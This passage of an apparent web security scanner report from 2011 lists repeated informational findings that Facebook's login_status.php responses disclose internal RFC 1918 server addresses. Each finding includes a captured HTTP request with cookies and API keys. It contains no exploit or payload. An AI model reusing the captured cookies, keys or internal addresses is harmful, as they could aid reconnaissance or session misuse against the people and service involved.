User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.119.55
X-Cnection: close
Date: Sat, 17 Sep 2011 16:25:13 GMT
Content-Length: 257

<script type="text/javascript">
parent.postMessage("cb=f1325bcd04&origin=http\u00253A\u00252F\u00252Fwww.quickandsimple.com\u00252Ff38ae258cc&relation=parent&transport=postmessage&frame=f33f7cb634", "
...[SNIP]...
22.36. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=6606a44d10f0b87a63e3258379b62940&extern=2&channel=http%3A%2F%2Fwww.ugo.com%2Fxd_receiver.htm&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.13.35
X-Cnection: close
Date: Sat, 17 Sep 2011 16:37:56 GMT
Content-Length: 1075

<script>document.domain = "facebook.com";</script><script src="http://static.ak.connect.facebook.com/connect.php/en_US"></script><script>
var config = {"base_domain":"ugo.com","channel":"http:\/
...[SNIP]...
22.37. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=181790778546301&app_id=181790778546301&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df13204c78%26origin%3Dhttp%253A%252F%252Fwww.thedailygreen.com%252Ff29d10b224%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df321843b84%26origin%3Dhttp%253A%252F%252Fwww.thedailygreen.com%252Ff29d10b224%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3a09417fc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1961c2c28%26origin%3Dhttp%253A%252F%252Fwww.thedailygreen.com%252Ff29d10b224%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3a09417fc&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df5d4fd9d8%26origin%3Dhttp%253A%252F%252Fwww.thedailygreen.com%252Ff29d10b224%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3a09417fc&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1e9447f24%26origin%3Dhttp%253A%252F%252Fwww.thedailygreen.com%252Ff29d10b224%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3a09417fc&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.thedailygreen.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.57.57
X-Cnection: close
Date: Sat, 17 Sep 2011 16:28:12 GMT
Content-Length: 254

<script type="text/javascript">
parent.postMessage("cb=f5d4fd9d8&origin=http\u00253A\u00252F\u00252Fwww.thedailygreen.com\u00252Ff29d10b224&relation=parent&transport=postmessage&frame=f3a09417fc", "ht
...[SNIP]...
22.38. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=112965278727107&app_id=112965278727107&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1c832b2d%26origin%3Dhttp%253A%252F%252Fwww.seventeen.com%252Ff176a6a3d8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df32a89f66c%26origin%3Dhttp%253A%252F%252Fwww.seventeen.com%252Ff176a6a3d8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df19585fa88%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df97c0644%26origin%3Dhttp%253A%252F%252Fwww.seventeen.com%252Ff176a6a3d8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df19585fa88&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df32280497c%26origin%3Dhttp%253A%252F%252Fwww.seventeen.com%252Ff176a6a3d8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df19585fa88&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df17c1957f%26origin%3Dhttp%253A%252F%252Fwww.seventeen.com%252Ff176a6a3d8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df19585fa88&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.seventeen.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.40.63
X-Cnection: close
Date: Sat, 17 Sep 2011 16:25:26 GMT
Content-Length: 247

<script type="text/javascript">
parent.postMessage("cb=f32280497c&origin=http\u00253A\u00252F\u00252Fwww.seventeen.com\u00252Ff176a6a3d8&relation=parent&transport=postmessage&frame=f19585fa88", "http:
...[SNIP]...
22.39. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=217130754993329&app_id=217130754993329&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df134e363dc21d7e%26origin%3Dhttp%253A%252F%252Fwww.quickandsimple.com%252Ff14d6236da85c0e%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfeb1abcd1ecdd2%26origin%3Dhttp%253A%252F%252Fwww.quickandsimple.com%252Ff14d6236da85c0e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df374544ae482f26%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1323037218416a%26origin%3Dhttp%253A%252F%252Fwww.quickandsimple.com%252Ff14d6236da85c0e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df374544ae482f26&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3d9222ac127d7e%26origin%3Dhttp%253A%252F%252Fwww.quickandsimple.com%252Ff14d6236da85c0e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df374544ae482f26&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df30212bd03a2d98%26origin%3Dhttp%253A%252F%252Fwww.quickandsimple.com%252Ff14d6236da85c0e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df374544ae482f26&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.quickandsimple.com/
Cookie: datr=wBc3TiBHvRZVzlo1IH6EEoST; lu=SAa1VWe96iHwXaDAVSJQxUsw

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.240.34
X-Cnection: close
Date: Sat, 17 Sep 2011 16:53:57 GMT
Content-Length: 277

<script type="text/javascript">
parent.postMessage("cb=f3d9222ac127d7e&origin=http\u00253A\u00252F\u00252Fwww.quickandsimple.com\u00252Ff14d6236da85c0e&relation=parent&transport=postmessage&frame=f374
...[SNIP]...
22.40. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=188431397834075&app_id=188431397834075&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df261027e8495f96%26origin%3Dhttp%253A%252F%252Fwww.local.com%252Ff9f634828afae%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2d2769de2878a8%26origin%3Dhttp%253A%252F%252Fwww.local.com%252Ff9f634828afae%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1dc0ac680ab294%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dffc57098f411d2%26origin%3Dhttp%253A%252F%252Fwww.local.com%252Ff9f634828afae%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1dc0ac680ab294&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2a3b96d853b3b%26origin%3Dhttp%253A%252F%252Fwww.local.com%252Ff9f634828afae%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1dc0ac680ab294&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df220930534127c4%26origin%3Dhttp%253A%252F%252Fwww.local.com%252Ff9f634828afae%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1dc0ac680ab294&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.local.com/
Cookie: datr=wBc3TiBHvRZVzlo1IH6EEoST; lu=SAa1VWe96iHwXaDAVSJQxUsw

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.52.40
X-Cnection: close
Date: Sat, 17 Sep 2011 16:57:27 GMT
Content-Length: 254

<script type="text/javascript">
parent.postMessage("cb=f2a3b96d853b3b&origin=http\u00253A\u00252F\u00252Fwww.local.com\u00252Ff9f634828afae&relation=parent&transport=postmessage&frame=f1dc0ac680ab294"
...[SNIP]...
22.41. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=184150621627178&app_id=184150621627178&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df27ad3df04%26origin%3Dhttp%253A%252F%252Fwww.delish.com%252Ff51e4653%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df398530638%26origin%3Dhttp%253A%252F%252Fwww.delish.com%252Ff51e4653%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df22597784%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfd7e66c74%26origin%3Dhttp%253A%252F%252Fwww.delish.com%252Ff51e4653%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df22597784&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df202883b9c%26origin%3Dhttp%253A%252F%252Fwww.delish.com%252Ff51e4653%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df22597784&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df393871c%26origin%3Dhttp%253A%252F%252Fwww.delish.com%252Ff51e4653%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df22597784&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.delish.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.196.77
X-Cnection: close
Date: Sat, 17 Sep 2011 16:24:45 GMT
Content-Length: 236

<script type="text/javascript">
parent.postMessage("cb=f202883b9c&origin=http\u00253A\u00252F\u00252Fwww.delish.com\u00252Ff51e4653&relation=parent&transport=postmessage&frame=f22597784", "http:\/\/ww
...[SNIP]...
22.42. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=6606a44d10f0b87a63e3258379b62940&extern=2&channel=http%3A%2F%2Fwww.ugo.com%2Fxd_receiver.htm&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.105.116
X-Cnection: close
Date: Sat, 17 Sep 2011 17:13:00 GMT
Content-Length: 1075

<script>document.domain = "facebook.com";</script><script src="http://static.ak.connect.facebook.com/connect.php/en_US"></script><script>
var config = {"base_domain":"ugo.com","channel":"http:\/
...[SNIP]...
22.43. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=221007247927557&app_id=221007247927557&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2385d7ff8%26origin%3Dhttp%253A%252F%252Fwww.misquincemag.com%252Ff99e1f4b4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df27ca64254%26origin%3Dhttp%253A%252F%252Fwww.misquincemag.com%252Ff99e1f4b4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2dee7d0a8%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df20251334%26origin%3Dhttp%253A%252F%252Fwww.misquincemag.com%252Ff99e1f4b4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2dee7d0a8&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1915c3b9%26origin%3Dhttp%253A%252F%252Fwww.misquincemag.com%252Ff99e1f4b4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2dee7d0a8&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df180dfd73c%26origin%3Dhttp%253A%252F%252Fwww.misquincemag.com%252Ff99e1f4b4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2dee7d0a8&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.misquincemag.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.118.55
X-Cnection: close
Date: Sat, 17 Sep 2011 16:25:46 GMT
Content-Length: 250

<script type="text/javascript">
parent.postMessage("cb=f1915c3b9&origin=http\u00253A\u00252F\u00252Fwww.misquincemag.com\u00252Ff99e1f4b4&relation=parent&transport=postmessage&frame=f2dee7d0a8", "http
...[SNIP]...
22.44. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=4a27a904c492f128d46163d02575765c&app_id=4a27a904c492f128d46163d02575765c&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfea638764%26origin%3Dhttp%253A%252F%252Fwww.kaboodle.com%252Ff24d71d27c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfc7f55978%26origin%3Dhttp%253A%252F%252Fwww.kaboodle.com%252Ff24d71d27c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df25c0e02e8%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3cd6df3f8%26origin%3Dhttp%253A%252F%252Fwww.kaboodle.com%252Ff24d71d27c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df25c0e02e8&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1560bc888%26origin%3Dhttp%253A%252F%252Fwww.kaboodle.com%252Ff24d71d27c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df25c0e02e8&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2ee653eec%26origin%3Dhttp%253A%252F%252Fwww.kaboodle.com%252Ff24d71d27c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df25c0e02e8&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.kaboodle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.219.65
X-Cnection: close
Date: Sat, 17 Sep 2011 16:24:53 GMT
Content-Length: 245

<script type="text/javascript">
parent.postMessage("cb=f1560bc888&origin=http\u00253A\u00252F\u00252Fwww.kaboodle.com\u00252Ff24d71d27c&relation=parent&transport=postmessage&frame=f25c0e02e8", "http:\
...[SNIP]...
22.45. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=188431397834075&app_id=188431397834075&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df13c607dfc%26origin%3Dhttp%253A%252F%252Fwww.local.com%252Ff46d0d5f8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfd228a70%26origin%3Dhttp%253A%252F%252Fwww.local.com%252Ff46d0d5f8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df272fcebe4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3114dd90c%26origin%3Dhttp%253A%252F%252Fwww.local.com%252Ff46d0d5f8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df272fcebe4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df239d9d35%26origin%3Dhttp%253A%252F%252Fwww.local.com%252Ff46d0d5f8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df272fcebe4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dff494c534%26origin%3Dhttp%253A%252F%252Fwww.local.com%252Ff46d0d5f8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df272fcebe4&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.114.33
X-Cnection: close
Date: Sat, 17 Sep 2011 16:24:43 GMT
Content-Length: 236

<script type="text/javascript">
parent.postMessage("cb=f239d9d35&origin=http\u00253A\u00252F\u00252Fwww.local.com\u00252Ff46d0d5f8&relation=parent&transport=postmessage&frame=f272fcebe4", "http:\/\/ww
...[SNIP]...
22.46. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=6606a44d10f0b87a63e3258379b62940&extern=2&channel=http%3A%2F%2Fwww.ugo.com%2Fxd_receiver.htm&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.156.116
X-Cnection: close
Date: Sat, 17 Sep 2011 17:18:26 GMT
Content-Length: 1075

<script>document.domain = "facebook.com";</script><script src="http://static.ak.connect.facebook.com/connect.php/en_US"></script><script>
var config = {"base_domain":"ugo.com","channel":"http:\/
...[SNIP]...
22.47. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=6606a44d10f0b87a63e3258379b62940&extern=2&channel=http%3A%2F%2Fwww.ugo.com%2Fxd_receiver.htm&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
